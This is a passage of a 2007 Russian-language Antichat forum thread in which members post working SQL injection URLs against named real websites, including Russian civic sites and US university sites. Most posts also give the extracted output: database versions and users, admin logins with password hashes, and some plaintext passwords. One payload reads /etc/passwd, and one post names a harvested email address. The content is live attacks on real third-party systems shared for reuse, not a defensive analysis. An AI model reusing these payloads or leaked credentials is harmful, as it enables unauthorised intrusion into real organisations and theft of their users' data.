ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3441  
Старый 26.10.2007, 13:38
Аватар для fRg
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

www.civitas.ru - Всероссийский Гражданский Конгресс
Код:
http://www.civitas.ru/newsprint.php?code=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),4,5,6,7,8,9,10/*
5.0.18:congress:alik@localhost
663 таблицы:
Код:
http://www.civitas.ru/newsprint.php?code=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt(table_name,0x71),0x71)),4,5,6,7,8,9,10+from+information_schema.tables+limit+662,1/*
Копался в таблицах - нашёл табу person.
Данные из person в формате "имя:пасс:мыло:телефон:web":
Код:
http://www.civitas.ru/newsprint.php?code=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt(name,0x71),0x71),0x3a,aes_decrypt(aes_encrypt(pass,0x71),0x71),0x3a,aes_decrypt(aes_encrypt(email,0x71),0x71),0x3a,aes_decrypt(aes_encrypt(phone,0x71),0x71),0x3a,aes_decrypt(aes_encrypt(web,0x71),0x71)),4,5,6,7,8,9,10+from+person+limit+0,1/*
интересные ящики попадаются "Novitskiy@duma.mos.ru"
www.gost.net.ru - БД ГОСТы
Код:
http://www.gost.net.ru/download.php?fFolder=57&fFrom=katalog&fItem=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13/*
4.1.20:db000030:u000030@localhost
www.sportclubmai.ru - СПОРТКЛУБ МАИ
Код:
http://www.sportclubmai.ru/admin/admin_news/long_news.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/*
4.0.27-standard:db_sportclubmai:sportclubmai@localhost
 
Ответить с цитированием

  #3442  
Старый 26.10.2007, 14:40
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://www.legis.krsn.ru/newsinfo.php?UID=-1+union+select+1,concat(version(),0x2F,database(), 0x2F,user()),3,4,5,6,7,8,9,10,11,12,13,1,1,1/*

4.0.27-Max/zs24/zs24@localhost



http://www.pro-robotu.kiev.ua/articles.php?aID=-41+union+select+concat(version(),0x2F,database(),0 x2F,user()),2/*&action=view_article

4.0.27-standard-log/rabota2/robota@localhost
 
Ответить с цитированием

  #3443  
Старый 26.10.2007, 19:37
Аватар для Booblick
Booblick
Новичок
Регистрация: 05.10.2007
Сообщений: 2
Провел на форуме:
10967

Репутация: 4
По умолчанию

Люди добрые нужна помощь, как выйцти на данные к базе,
вот, что смог накавырять....
http://ont.by/index.php?id_issue=-5+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6,7,8,9,10,11/*
 
Ответить с цитированием

  #3444  
Старый 27.10.2007, 11:54
Аватар для Iceangel_
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

Код:
http://www.websight.ru/conf/addanswer.php?id=-275+UNION+SELECT+1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7,8,9,10,11,12,13/*
4.0.27-max-log:websight:websight@v54.valuehost.ru

P.S
Народ не подскажите где можно скачать словарь с самыми распространенными именами таблиц и полей? с меня ++
 
Ответить с цитированием

  #3445  
Старый 27.10.2007, 12:57
Аватар для fobofob
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

код:

http://farms.byu.edu/display-print.php?table=foreign_lang&id=-64+union+select+1,2,3,4,5,6,load_file(0x2f6574632f 706173737764),8,9+from+mysql.user/*
 
Ответить с цитированием

  #3446  
Старый 27.10.2007, 13:22
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

press-c.crimea.ua

http://press-c.crimea.ua/hotnews/?mode=news&cmd=newsRead&sid=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6,7,8,9,10,11,12,13,1,1,1,1/*

5.0.45/portcan/evgeni@localhost



http://press-c.crimea.ua/hotnews/?mode=news&cmd=newsRead&sid=-1+union+select+1,2,3,concat_ws(0x2F,account_lid,ac count_pwd),5,6,7,8,9,10,11,12,13,1,1,1,1+from+egro upware.egw_accounts+limit+4,1/*

логин/хеш
eadmin/5bd452074f51edcc480f575dda1faf21

--------------------------------------------------------------------

http://expert.com.ua/index.php?option=news&id=-4'+union+select+1,concat_ws(0x2F,version(),databas e(),user()),3,4,5,6/*&dir=2

4.1.22/expert/u_expert@localhost
 
Ответить с цитированием

  #3447  
Старый 27.10.2007, 16:09
Аватар для fobofob
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

http://spa.american.edu/pages.php?ID=-3/**/union/**/select/**/1,2,3,cast(concat_ws(0x3a,version(),user(),databas e())+as+binary),5+--+


4.1.13a-nt:spauser@localhost:spa[B]
 
Ответить с цитированием

  #3448  
Старый 27.10.2007, 16:54
Аватар для Nea7
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
Arrow

Код:
http://www.freefromcorporateamerica.com/archives.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(version(),0x71),0x71),3,4,5,6/*
4.1.14-Debian_5-log
Цитата:
http://www.realestatelistingsfree.com/detail.php?id=22222+union+select+1,2,3,4,5,6,7,8,9 ,10,concat(user(),0x3a,version(),0x3a,database()), 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39/*
jbrink_realty2@localhost:4.1.22-standard:jbrink_realestate
Код HTML:
http://www.freechineselessons.com/lesson.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8/*
guitar8_paul2@localhost:4.1.22-standard:guitar8_freechineselessons
Код:
http://www.turkprogram.com/indir.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6/*
tpusr@localhost:5.0.27-community-nt:tp_db
Код HTML:
http://www.turkprogram.com/indir.php?id=-1+union+select+1,concat(char(64,64),email,0x3a,username,0x3a,password,char(64,64)),3,4,5,6+from+tbl_uyeler+limit+0,1/*
 
Ответить с цитированием

  #3449  
Старый 27.10.2007, 17:47
Аватар для fobofob
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

Код:

http://www.ncat.edu/press_releases/disp_release.php?ID=-3214+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,concat(user,0x3a,password),17,18+from+mysql.us er+limit+0,1/*

есть еще таблица admins
 
Ответить с цитированием

  #3450  
Старый 28.10.2007, 00:09
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://www.vostok-online.ru/index.php?showNewsDetails=1&newsId=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(user(),0x 71),0x71),3,4,5,AES_DECRYPT(AES_ENCRYPT(version(), 0x71),0x71),AES_DECRYPT(AES_ENCRYPT(database(),0x7 1),0x71)/*

4.1.11-Debian_4sarge7-log/disketka_vostok/disketka_vostok@85.249.135.3

-------------------------------------------------------------------

pskov.org.ru

http://www.pskov.org.ru/?action=show&id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9/*

5.0.44-log/news/infonet@localhost



http://www.pskov.org.ru/?action=show&id=-1+union+select+1,concat_ws(0x2F,name,uname,passwd) ,3,4,5,6,7,8,9+from+admin+limit+0,1/*

имя/логин/пароль не хеш.
Дмитрий Антонюк/master/newsbase и др.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ